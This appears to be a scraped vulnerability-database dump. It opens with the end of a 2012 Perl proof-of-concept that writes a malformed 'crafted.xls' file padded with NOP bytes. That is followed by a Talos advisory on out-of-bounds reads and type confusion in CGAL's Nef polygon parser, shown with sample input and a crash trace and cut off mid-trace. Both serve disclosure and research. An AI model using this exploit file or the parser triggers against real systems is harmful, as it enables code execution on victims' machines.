x03\x00\x00\x00\x00\x00\x34\x10\x00\x00\x25\x10\x1A".\r\n"\x00\x02\x02\x01\x00\x00\x00\x00\x00\x44\x00\x00\x00\xB4\x04\x00".\r\n"\x00\xF4\x00\x00\x00\xDB\x05\x00\x00\x89\x02\x33\x10\x00\x00\x4F".\r\n"\x10\x14\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2F".\r\n"\x00\x00\x00\xD0\x00\x00\x00\x26\x10\x02\x00\x07\x00\x51\x10\x08".\r\n"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0D\x10\x12\x00\x00\x00\x0F".\r\n"\x56\x6F\x6C\x74\x61\x67\x65\x20\x28\x76\x6F\x6C\x74\x73\x29\x27".\r\n"\x10\x06\x00\x02\x00\x00\x00\x00\x00\x34\x10\x00\x00\x35\x10\x00".\r\n"\x00\x32\x10\x04\x00\x00\x00\x03\x00\x33\x10\x00\x00\x07\x10\x0A".\r\n"\x00\x80\x80\x80\x00\x00\x00\x00\x00\x00\x00\x0A\x10\x0C\x00\xC0".\r\n"\xC0\xC0\x00\x00\x00\x00\x00\x01\x00\x00\x00\x34\x10\x00\x00\x14".\r\n"\x10\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x33\x10\x00\x00\x18\x10\x02\x00\x00".\r\n"\x00\x22\x10\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x15".\r\n"\x10\x14\x00\x12\x0C\x00\x00\xAC\x06\x00\x00\x6F\x03\x00\x00\xF1".\r\n"\x01\x00\x00\x03\x01\x1F\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x05".\r\n"\x00\x02\x00\x14\x0C\x00\x00\xAE\x06\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x25\x10\x1A\x00\x02\x02\x01\x00\x00\x00\x00\x00\xDC".\r\n"\xFF\xFF\xFF\xCE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\xB1".\r\n"\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00\x02\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x10\x08".\r\n"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x34\x10\x00\x00\x34\x10\x00".\r\n"\x00\x24\x10\x02\x00\x02\x00\x25\x10\x1A\x00\x02\x02\x01\x00\x00".\r\n"\x00\x00\x00\xDC\xFF\xFF\xFF\xCE\xFF\xFF\xFF\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\xB1\x00\x33\x10\x00\x00\x4F\x10\x14\x00\x02\x00\x02".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x26\x10\x02\x00\x08\x00\x51\x10\x08\x00\x00\x01\x00\x00\x00".\r\n"\x00\x00\x00\x34\x10\x00\x00\x34\x10\x00\x00\x34\x10\x00\x00\x25".\r\n"\x10\x1A\x00\x02\x02\x01\x00\x00\x00\x00\x00\xED\x02\x00\x00\x4F".\r\n"\x00\x00\x00\xC1\x09\x00\x00\x70\x01\x00\x00\x81\x00\x33\x10\x00".\r\n"\x00\x4F\x10\x14\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\xE0\x01\x00\x00\x33\x00\x00\x00\x26\x10\x02\x00\x05\x00\x51".\r\n"\x10\x08\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0D\x10\x24\x00\x00".\r\n"\x00\x21\x46\x6C\x61\x73\x68\x6C\x69\x67\x68\x74\x73\x20\x28\x6D".\r\n"\x65\x64\x69\x75\x6D\x20\x64\x72\x61\x69\x6E\x20\x64\x65\x76\x69".\r\n"\x63\x65\x29\x27\x10\x06\x00\x01\x00\x00\x00\x00\x00\x34\x10\x00".\r\n"\x00\x34\x10\x00\x00\x00\x00\x0A\x00\x00\x00\x22\x00\x00\x00\x01".\r\n"\x00\x00\x00\x03\x02\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x03\x02\x0E\x00\x01\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\xE0\x3F\x03\x02\x0E\x00\x02\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x03\x02\x0E\x00\x03\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF8\x3F\x03\x02\x0E\x00\x04".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x03\x02\x0E".\r\n"\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x40\x03".\r\n"\x02\x0E\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08".\r\n"\x40\x03\x02\x0E\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x0C\x40\x03\x02\x0E\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x10\x40\x03\x02\x0E\x00\x09\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x12\x40\x03\x02\x0E\x00\x0A\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x14\x40\x03\x02\x0E\x00\x0B\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\x40\x03\x02\x0E\x00\x0C".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x40\x03\x02\x0E".\r\n"\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\x40\x03".\r\n"\x02\x0E\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C".\r\n"\x40\x03\x02\x0E\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x1E\x40\x03\x02\x0E\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x20\x40\x03\x02\x0E\x00\x11\x00\x00\x00\x00\x00\xB5".\r\n"\x81\x4E\x1B\xE8\xB4\xF9\x3F\x03\x02\x0E\x00\x12\x00\x00\x00\x00".\r\n"\x00\x71\x3D\x0A\xD7\xA3\x70\xF6\x3F\x03\x02\x0E\x00\x13\x00\x00".\r\n"\x00\x00\x00\x79\xE9\x26\x31\x08\xAC\xF5\x3F\x03\x02\x0E\x00\x14".\r\n"\x00\x00\x00\x00\x00\xAA\xF1\xD2\x4D\x62\x10\xF5\x3F\x03\x02\x0E".\r\n"\x00\x15\x00\x00\x00\x00\x00\xEE\x7C\x3F\x35\x5E\xBA\xF4\x3F\x03".\r\n"\x02\x0E\x00\x16\x00\x00\x00\x00\x00\x67\x66\x66\x66\x66\x66\xF4".\r\n"\x3F\x03\x02\x0E\x00\x17\x00\x00\x00\x00\x00\x30\x96\xFC\x62\xC9".\r\n"\x2F\xF4\x3F\x03\x02\x0E\x00\x18\x00\x00\x00\x00\x00\x63\x82\x07".\r\n"\xF3\x44\xFD\xF3\x3F\x03\x02\x0E\x00\x19\x00\x00\x00\x00\x00\x4E".\r\n"\x62\x10\x58\x39\xB4\xF3\x3F\x03\x02\x0E\x00\x1A\x00\x00\x00\x00".\r\n"\x00\x7B\x14\xAE\x47\xE1\x7A\xF3\x3F\x03\x02\x0E\x00\x1B\x00\x00".\r\n"\x00\x00\x00\xED\x7C\x3F\x35\x5E\x3A\xF3\x3F\x03\x02\x0E\x00\x1C".\r\n"\x00\x00\x00\x00\x00\x3B\x26\x78\x30\x4F\xD4\xF2\x3F\x03\x02\x0E".\r\n"\x00\x1D\x00\x00\x00\x00\x00\x24\x06\x81\x95\x43\x8B\xF2\x3F\x03".\r\n"\x02\x0E\x00\x1E\x00\x00\x00\x00\x00\x53\x71\xF6\xE1\x33\xEC\xF1".\r\n"\x3F\x03\x02\x0E\x00\x1F\x00\x00\x00\x00\x00\x08\xAC\x1C\x5A\x64".\r\n"\x3B\xF0\x3F\x03\x02\x0E\x00\x20\x00\x00\x00\x00\x00\xDE\x4F\x8D".\r\n"\x97\x6E\x12\xEA\x3F\x03\x02\x0E\x00\x21\x00\x00\x00\x00\x00\xBE".\r\n"\x9F\x1A\x2F\xDD\x24\xE8\x3F\x0A\x00\x00\x00\x3D\x00\x12\x00\x00".\r\n"\x00\x30\x00\xAC\x2F\xF4\x1A\x38\x00\x00\x00\x00\x00\x01\x00\x58".\r\n"\x02\x3E\x02\x0A\x00\xB6\x06\x00\x00\x00\x00\x00\x00\x00\x00\x1D".\r\n"\x00\x0F\x00\x03\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00".\r\n"\x00\x00\xAB\x00\x22\x00\x20\x00\x48\xFE\xFF\xFF\xFF\xFF\xFF\xFF".\r\n"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".\r\n"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x0A\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\xFE\xFF\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xE0\x85\x9F\xF2".\r\n"\xF9\x4F\x68\x10\xAB\x91\x08\x00\x2B\x27\xB3\xD9\x30\x00\x00\x00".\r\n"\xC0\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x48\x00\x00\x00".\r\n"\x04\x00\x00\x00\x50\x00\x00\x00\x08\x00\x00\x00\x64\x00\x00\x00".\r\n"\x12\x00\x00\x00\x7C\x00\x00\x00\x0B\x00\x00\x00\x94\x00\x00\x00".\r\n"\x0C\x00\x00\x00\xA0\x00\x00\x00\x0D\x00\x00\x00\xAC\x00\x00\x00".\r\n"\x13\x00\x00\x00\xB8\x00\x00\x00\x02\x00\x00\x00\xE4\x04\x00\x00".\r\n"\x1E\x00\x00\x00\x0B\x00\x00\x00\x41\x6D\x62\x65\x72\x20\x48\x65".\r\n"\x73\x73\x00\x00\x1E\x00\x00\x00\x10\x00\x00\x00\x4B\x65\x6E\x6E".\r\n"\x65\x74\x68\x20\x4C\x2E\x20\x48\x65\x73\x73\x00\x1E\x00\x00\x00".\r\n"\x10\x00\x00\x00\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x45\x78".\r\n"\x63\x65\x6C\x00\x40\x00\x00\x00\x80\x8A\x1B\xF3\xAA\x71\xBE\x01".\r\n"\x40\x00\x00\x00\x80\xD3\x97\x2A\x71\x63\xBE\x01\x40\x00\x00\x00".\r\n"\x80\xD1\x7E\x9C\x9C\x87\xC2\x01\x03\x00\x00\x00\x00\x00\x00\x00";\r\n\r\n$crafted .= "\x00" x 3856;\r\n\r\n$crafted .=\r\n\r\n"\xFE\xFF\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\xD5\xCD\xD5".\r\n"\x9C\x2E\x1B\x10\x93\x97\x08\x00\x2B\x2C\xF9\xAE\x30\x00\x00\x00".\r\n"\xC0\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x38\x00\x00\x00".\r\n"\x0F\x00\x00\x00\x40\x00\x00\x00\x0B\x00\x00\x00\x64\x00\x00\x00".\r\n"\x10\x00\x00\x00\x6C\x00\x00\x00\x0D\x00\x00\x00\x74\x00\x00\x00".\r\n"\x0C\x00\x00\x00\x9C\x00\x00\x00\x02\x00\x00\x00\xE4\x04\x00\x00".\r\n"\x1E\x00\x00\x00\x1A\x00\x00\x00\x44\x65\x6C\x6C\x20\x43\x6F\x6D".\r\n"\x70\x75\x74\x65\x72\x20\x43\x6F\x72\x70\x6F\x72\x61\x74\x69\x6F".\r\n"\x6E\x00\x53\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00".\r\n"\x00\x00\x00\x00\x1E\x10\x00\x00\x01\x00\x00\x00\x1C\x00\x00\x00".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".\r\n"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x0C\x10\x00\x00".\r\n"\x02\x00\x00\x00\x1E\x00\x00\x00\x0B\x00\x00\x00\x57\x6F\x72\x6B".\r\n"\x73\x68\x65\x65\x74\x73\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00";\r\n\r\n$crafted .= "\x00" x 3856;\r\n\r\n$crafted .=\r\n\r\n"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00".\r\n"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00".\r\n"\x09\x00\x00\x00\x0A\x00\x00\x00\x0B\x00\x00\x00\x0C\x00\x00\x00".\r\n"\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00".\r\n"\xFE\xFF\xFF\xFF\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00".\r\n"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00".\r\n"\xFE\xFF\xFF\xFF\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00".\r\n"\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00".\r\n"\xFE\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF";\r\n\r\n$crafted .= "\xFF" x 368;\r\n\r\n$crafted .=\r\n\r\n"\x52\x00\x6F\x00\x6F\x00\x74\x00\x20\x00\x45\x00\x6E\x00\x74\x00".\r\n"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x16\x00\x05\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x02\x00\x00\x00".\r\n"\x10\x08\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC0\xD4\xD3\x05".\r\n"\xC1\xA6\xCD\x01\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x42\x00\x6F\x00\x6F\x00\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x0A\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x8C\x21\x00\x00\x00\x00\x00\x00".\r\n"\x05\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00\x72\x00\x79\x00".\r\n"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00".\r\n"\x69\x00\x6F\x00\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x28\x00\x02\x01\x01\x00\x00\x00\x03\x00\x00\x00\xFF\xFF\xFF\xFF".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x11\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00".\r\n"\x05\x00\x44\x00\x6F\x00\x63\x00\x75\x00\x6D\x00\x65\x00\x6E\x00".\r\n"\x74\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00\x72\x00\x79\x00".\r\n"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00".\r\n"\x69\x00\x6F\x00\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x38\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".\r\n"\x00\x00\x00\x00\x19\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00";\r\n\r\nopen(C, ">:raw", "crafted.xls");\r\nprint C $crafted;\r\nclose(C);\r\n \r\n# http://0xffe4.org\r\n", "published": "2012-10-15T00:00:00", "modified": "2012-10-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28631", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:46", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-08-31T11:10:46", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-28631"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32653", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:46", "rev": 2}, "vulnersScore": 6.4}, "affectedSoftware": []}
{"talos": [{"lastseen": "2021-02-27T01:28:18", "bulletinFamily": "info", "cvelist": ["CVE-2020-35635", "CVE-2020-28633", "CVE-2020-28614", "CVE-2020-28629", "CVE-2020-28611", "CVE-2020-28618", "CVE-2020-35630", "CVE-2020-28628", "CVE-2020-28620", "CVE-2020-35629", "CVE-2020-28623", "CVE-2020-28630", "CVE-2020-28615", "CVE-2020-28627", "CVE-2020-28605", "CVE-2020-28625", "CVE-2020-28608", "CVE-2020-28635", "CVE-2020-35636", "CVE-2020-28617", "CVE-2020-35633", "CVE-2020-28613", "CVE-2020-28606", "CVE-2020-35628", "CVE-2020-28626", "CVE-2020-28616", "CVE-2020-35634", "CVE-2020-28634", "CVE-2020-28602", "CVE-2020-28624", "CVE-2020-28610", "CVE-2020-28604", "CVE-2020-28636", "CVE-2020-28632", "CVE-2020-28609", "CVE-2020-28631", "CVE-2020-28619", "CVE-2020-35631", "CVE-2020-28622", "CVE-2020-28601", "CVE-2020-28621", "CVE-2020-28603", "CVE-2020-28607", "CVE-2020-35632", "CVE-2020-28612"], "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1225\n\n## CGAL libcgal multiple code execution vulnerabilities in Nef polygon-parsing code\n\n##### February 24, 2021\n\n##### CVE Number\n\nCVE-2020-28601-CVE-2020-28636,CVE-2020-35628-CVE-2020-35636 \n\n### Summary\n\nMultiple code execution vulnerabilities exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger any of these vulnerabilities.\n\n### Tested Versions\n\nCGAL Project libcgal CGAL-5.1.1\n\n### Product URLs\n\n<https://github.com/CGAL/cgal>\n\n### CVSSv3 Score\n\n10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-129 - Improper Validation of Array Index\n\n### Details\n\nLibcgal is an open-source C++ library that provides geometric algorithms for fast and reliable data processing. It is used in an array of research projects and computational areas, and other open-source projects such as Openscad.\n\nOut of the multitude of shapes CGAL is capable of handling, today we visit the [Nef polygon](<https://en.wikipedia.org/wiki/Nef_polygon>), whose parsing code can be found at `CGAL/include/CGAL/Nef_2` (for 2-dimensional operations), `CGAL/include/CGAL/Nef_3` for (3-dimensional operations), or `CGAL/include/CGAL/Nef_S2` (for 2-dimensional operations on a Nef Polygon bound by a sphere). For the purposes of this advisory, we only discuss Nef_3 specifically, however we will also briefly cover issues within the other objects as well. \nTo start, an example `.nef3` file:\n \n \n Selective Nef Complex // [1]\n standard\n vertices 8 // [2]\n halfedges 42 // [3]\n facets 18\n volumes 2\n shalfedges 84\n shalfloops 2\n sfaces 30\n 0 { 0 2, 0 5, 0 1, -2 | 0 0 5 1 } 1 // [4]\n 1 { 3 5, 6 11, 2 3, -2 | 5 0 5 1 } 1\n 2 { 6 8, 12 17, 4 5, -2 | 5 5 5 1 } 1\n 3 { 9 11, 18 23, 6 7, -2 | 0 5 0 1 } 1\n 4 { 12 14, 24 29, 8 9, -2 | 5 0 0 1 } 1\n 5 { 15 17, 30 35, 10 11, -2 | 5 5 0 1 } 1\n 6 { 18 20, 36 41, 12 13, -2 | 0 5 5 1 } 1\n 7 { 21 23, 42 47, 14 15, -2 | 0 0 3 1 } 0\n 0 { 3, 0, 0 0 | 1 0 0 1 } 1 // [5]\n 1 { 18, 0, 0 5 | 0 1 0 1 } 1\n 2 { 21, 0, 0 4 | 0 0 -1 1 } 1\n 3 { 0, 1, 0 6 | -1 0 0 1 } 1\n 4 { 6, 1, 0 7 | 0 1 0 1 } 1\n 5 { 13, 1, 0 10 | 0 0 -1 1 } 1\n // [...]\n 40 { 28, 13, 0 82 | 1 0 0 1 } 0\n 41 { 30, 13, 0 79 | 0 0 -1 1 } 0\n // [...]\n \n\nAfter the magic bytes [1] we see a set of numbers corresponding to the amount of each given data type. Thus the line at [2] tells us there\u2019s 8 vertices, and the line at [3] tells us there\u2019s 42 halfedges and so forth. At [4] we see the start of the vertices, 8 entries in all, and at [5] we begin the halfedges. A set of vectors are initialized from these entries as such:\n \n \n // \"Nef_3/SNC_io_parser.h\"\n template <typename EW>\n void SNC_io_parser<EW>::read()\n {\n //[...]\n \n for(i=0; i<vn; ++i) Vertex_of.push_back(this->sncp()->new_vertex_only());\n for(i=0; i<en; ++i) Edge_of.push_back(this->sncp()->new_halfedge_only());\n for(i=0; i<fn; ++i) Halffacet_of.push_back(this->sncp()->new_halffacet_only());\n for(i=0; i<cn; ++i) Volume_of.push_back(this->sncp()->new_volume_only());\n for(i=0; i<sen; ++i) SEdge_of.push_back(this->sncp()->new_shalfedge_only());\n for(i=0; i<sln; ++i) SLoop_of.push_back(this->sncp()->new_shalfloop_only());\n for(i=0; i<sfn; ++i) SFace_of.push_back(this->sncp()->new_sface_only());\n //[...]\n \n\nLet us now examine the parsing code for a given vertices (e.g. `5 { 15 17, 30 35, 10 11, -2 | 5 5 0 1 } 1`):\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_vertex(Vertex_handle vh) {\n \n bool OK = true;\n int index;\n //[...]\n \n in >> index; // [1]\n OK = OK && test_string(\"{\"); // [2]\n vh->sncp() = this->sncp();\n \n in >> index; // [3]\n vh->svertices_begin() = (index >= 0 ? Edge_of[index] : this->svertices_end()); // [4]\n in >> index;\n vh->svertices_last() = index >= 0 ? Edge_of[index] : this->svertices_end(); \n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfedges_begin() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n in >> index;\n vh->shalfedges_last() = index >= 0 ? SEdge_of[index] : this->shalfedges_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->sfaces_begin() = index >= 0 ? SFace_of[index] : this->sfaces_end();\n in >> index;\n vh->sfaces_last() = index >= 0 ? SFace_of[index] : this->sfaces_end();\n OK = OK && test_string(\",\");\n in >> index;\n vh->shalfloop() = index >= 0 ? SLoop_of[index] : this->shalfloops_end();\n OK = OK && test_string(\"|\");\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n in >> hx >> hy >> hz >> hw;\n vh->point() = Point_3(hx,hy,hz,hw);\n #else\n vh->point() =\n Geometry_io<typename K::Kernel_tag, Kernel>::template read_point<Kernel, K>(in);\n #endif\n OK = OK && test_string(\"}\");\n in >> vh->mark();\n \n return OK;\n }\n \n\nAt [1] we see the index of the entry being read into `int index`, and at [2] we see the left bracket being discarded. The first datapoint of our vertices is read in as an integer at [3], and then assuming it\u2019s `>= 0`, our `Vertex_handle vh->svertices_begin()` object member is assigned as the `Edge_of[index]` vector index. This pattern continues for every member of our `Vertex_handle` object, for every vertex object that is read in. Let us now examine what happens upon reading a given halfedge (e.g. `0 { 3, 0, 0 0 | 1 0 0 1 } 1`):\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_edge(Halfedge_handle eh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT hx,hy,hz,hw;\n #endif\n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n eh->twin() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n eh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n if(index == 0) {\n in >> index;\n eh->out_sedge() = SEdge_of[index];\n } else {\n in >> index;\n eh->incident_sface() = SFace_of[index];\n }\n OK = OK && test_string(\"|\");\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n in >> hx >> hy >> hz >> hw;\n eh->point() = Sphere_point(hx,hy,hz);\n #else\n eh->point() =\n Geometry_io<typename K::Kernel_tag, Kernel>::template read_point<Kernel,K>(in);\n #endif\n OK = OK && test_string(\"}\");\n in >> eh->mark();\n \n return OK;\n }\n \n\nWithout being repetitive, it suffices to say that the `read_edge` function follows the same exact code pattern, reading in indexes from our file and then assigning object members to vector items whose index we just read; this is the pattern for `read_facet`, `read_volume`, `read_sedge`, `read_sloop`, and `read_sface` as well. Also worth noting about this code pattern: there\u2019s no checking on the indexes between reading them and using them as a vector index. Thus, every object member can be assigned arbitrary memory instead of another given object. This quickly becomes a huge issue when we start dereferencing these objects in other parts of the code, resulting in type confusion and code execution.\n\n#### CVE-2020-28601 - Nef_2/PM_io_parser.h PM_io_parser::read_vertex() Face_of[] OOB read\n\nAn oob read vulnerability exists in Nef_2/PM_io_parser.h PM_io_parser::read_vertex() Face_of[] OOB read:\n \n \n template <typename PMDEC>\n bool PM_io_parser<PMDEC>::read_vertex(Vertex_handle v)\n {\n // precondition: nodes exist\n // syntax: index { mark, point, isolated object }\n int n; bool iso; int f; Mark m; Point p;\n if ( !(in >> n) ||\n !check_sep(\"{\") ||\n !(in >> iso) ||\n !(in >> f) ||\n !check_sep(\",\") ||\n !(in >> m) ||\n !check_sep(\",\") ||\n !(in >> p) ||\n !check_sep(\"}\") ) return false;\n \n if (iso) v->set_face(Face_of[f]); // <--- oob read into `Face_of`\n \n\n#### Crash Information\n \n \n AddressSanitizer:DEADLYSIGNAL\n =================================================================\n ==3292887==ERROR: AddressSanitizer: SEGV on unknown address 0x61900001b4c0 (pc 0x7f6eccdfed82 bp 0x7ffd85dbaef0 sp 0x7ffd85dba6a8 T0)\n ==3292887==The signal is caused by a READ memory access.\n #0 0x7f6eccdfed82 /build/glibc-ZN95T4/glibc-2.31/string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:312\n #1 0x52f6d7 in __asan_memcpy (//boop/assorted_fuzzing/openscad/openscad-openscad-2020.12-RC2/nef3_fuzzdir/nef3_harness.bin+0x52f6d7)\n #2 0x7f6ed0202370 in bool CGAL::SNC_io_parser<CGAL::SNC_structure<CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool> >::read_sedge<CGAL::Cartesian<CGAL::Gmpq> >(CGAL::internal::In_place_list_iterator<CGAL::SNC_in_place_list_shalfedge<CGAL::SNC_indexed_items::SHalfedge<CGAL::SNC_structure<CGAL::Cartesian<CGAL::Gmpq>, CGAL::SNC_indexed_items, bool> > >, 